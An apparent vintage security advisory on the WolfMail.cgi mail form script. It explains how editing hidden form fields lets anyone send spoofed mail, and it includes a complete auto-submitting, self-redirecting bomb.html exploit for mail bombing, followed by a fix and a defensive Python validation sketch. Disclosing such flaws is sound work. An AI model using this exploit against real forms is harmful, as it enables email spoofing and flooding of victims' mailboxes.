WolfMail.cgi, a script that works similarly to formmail.cgi, allows users to send mail via a web interface. The configuration for WolfMail.cgi is not hardcoded in the script but is passed in via parameters in HTML input elements, allowing any user to send fake mail.
*+-._\_.-+*
WolfMail.cgi
*+-._/_.-+*
by Dead Beat
The Advanced Knowledge Network
https://www.advknowledge.net
Mail irritation possibility
(fake and highfire an account)
Wolfmail is a script similar to formmail.cgi which allows users to send mails
from the page without using their mail client. However, I guess the developers didn't
want to make the script so that you configure it in the actual script, but instead
have all the variables sent to the script from the actual execution file.
________
FAKING:
As said, most of the real configuration is done in the actual _.html file, so for
example the <input type="hidden" name="recipient" value="user@host.com">
is specified in the _.html file of the composer. You can easily download the site and
change the code. If, for example, you want to fake a mail to "fake@mailhost.com", you
just have to change the value field. Other things like subject and cc can be defined too
(read the installation papers to learn more).
For example:
<input type="hidden" name="recipient" value="email@example.com">
<input type="hidden" name="subject" value="From your site...">
could be changed to:
<input type="text" name="recipient" value="spam@mail.com">
<input type="text" name="subject" value="Hi you">
<input type="text" name="abemail" value="fake@mail.com" size="17" maxlength="140">
That would allow you to define those two values yourself and send the mail from fake@mail.com to spam@mail.com.
Just so that I don't get any mails from users here who don't understand this:
when you download the html file to change all the stuff, you have to set the path to where
formmail.php actually is. If you download it you will find a line like this:
<form action="scripts/formmail.php" method="POST" enctype="multipart/form-data">
If you downloaded from https://www.mailscriptuser.com/contact.html you have to change the line above to:
<form action="https://www.mailscriptuser.com/scripts/formmail.php" method="POST" enctype="multipart/form-data">
Got that? Good. The next little security vuln attackers could trip over is a way of bombing an address.
___________
HIGH FIRE
There is a variable called "redirect" which allows you to send the user to a site after the actual
mailing is done (something that tells you "Thanks! Your mail was sent" or whatever). This
option looks like this:
<input TYPE="HIDDEN" name="redirect" value="https://www.domain.com/contact/mail/thanks.htm">
Since the script itself doesn't check (log) your IP, an
attacker could download the html file, predefine all values (like message, subject, recipient, ...) and then
set a JavaScript that reloads the site and set the redirect URL to the html with the predefined values. This
way a loop would run and send emails over and over again.
EXAMPLE bomb.html:
<html>
<head>
<body onload="document.bomber.submit();">
<form name="bomber" method="POST" action="https://www.domain.com/contact/mail/wolfmail.cgi">
<input TYPE="text" name="required" value="adMail-Text|abemail">
<input TYPE="text" name="subject" value="Exploiting wolfmail.cgi">
<input TYPE="text" name="recipient" value="Victim@mail.com">
<input TYPE="text" name="redirect" value="C:\Exploit\bomb.html">
<input type="text" name="aaName" value="Wolfmail Exploiter" size="17" maxlength="140">
<input type="text" name="abemail" value="fake@mail.com" size="17" maxlength="140">
<textarea name="adMail-Text" rows="4" cols="13" wrap="virtual">Bombing text goes here</textarea>
<input type="submit" value="submit">
</body>
</head>
</html>
The script above can of course be used on many forms, so other mail forms may be affected too.
It is also possible to flood forums with such a script! I hope you will re-configure and check
your forms and the actual scripts behind them for this vulnerability. If you have found
another script that this trick works with, mail me; I will include it here and you will get
a credit of course!
SOLUTION
You should change the script or use another one so that the IPs you send from can only be used
ONCE, and let the email be predefined in a file or in the actual script.
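A sketch of the server-side checks this solution calls for, added here as an example and not taken
from the advisory or from WolfMail's code. The form_id field, the configuration values and the 60-second
per-IP window (a softer variant of "once per IP") are assumptions; the redirect and header checks go
beyond what the advisory proposes.

```python
import time
from urllib.parse import urlsplit

# Assumed server-side configuration (hypothetical names and values).
RECIPIENTS = {"contact": "webmaster@example.com"}   # form id -> fixed recipient
REDIRECT_HOSTS = {"www.example.com"}                # hosts allowed for the "thanks" page
DEFAULT_REDIRECT = "https://www.example.com/thanks.htm"
MIN_INTERVAL = 60.0                                 # seconds between mails per client IP

_last_sent = {}                                     # client IP -> time of last accepted mail


def build_mail(form, client_ip, now=None):
    """Validate one submission; return (mail, redirect_url) or raise ValueError."""
    now = time.time() if now is None else now

    # The recipient is looked up on the server; a posted "recipient" field is ignored.
    recipient = RECIPIENTS.get(form.get("form_id", ""))
    if recipient is None:
        raise ValueError("unknown form")

    # Reject line breaks in anything that ends up in a mail header.
    subject = form.get("subject", "")
    reply_to = form.get("abemail", "")
    for value in (subject, reply_to):
        if "\r" in value or "\n" in value:
            raise ValueError("line break in header field")

    # Throttle per client address so a reload loop cannot flood a mailbox.
    last = _last_sent.get(client_ip)
    if last is not None and now - last < MIN_INTERVAL:
        raise ValueError("rate limit")

    # Redirect only to https pages on our own hosts, otherwise use the default.
    target = urlsplit(form.get("redirect", ""))
    allowed = target.scheme == "https" and target.hostname in REDIRECT_HOSTS
    redirect = form["redirect"] if allowed else DEFAULT_REDIRECT

    _last_sent[client_ip] = now
    # The visitor's address goes into Reply-To, never into From or To.
    mail = {"To": recipient, "Reply-To": reply_to, "Subject": subject,
            "Body": form.get("adMail-Text", "")}
    return mail, redirect
```
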
I am quite sure that these aren't all of the bugs, but I didn't really go into the code. This is
just what I saw first. Thanks to b0iler and Ravish! Greetings out to StartX, Road^K|ll, Silver
and all of my friends I forgot!
Truthfully,
Dead Beat, strebergarten@hotmail.com
The Advanced Knowledge Network
https://www.advknowledge.net
Want more, new, better BUGS and other information? Then visit us!
--
Best regards,
Dead Beat
The Advanced Knowledge Network
https://www.advknowledge.net
mailto:Dead_Beat@gmx.de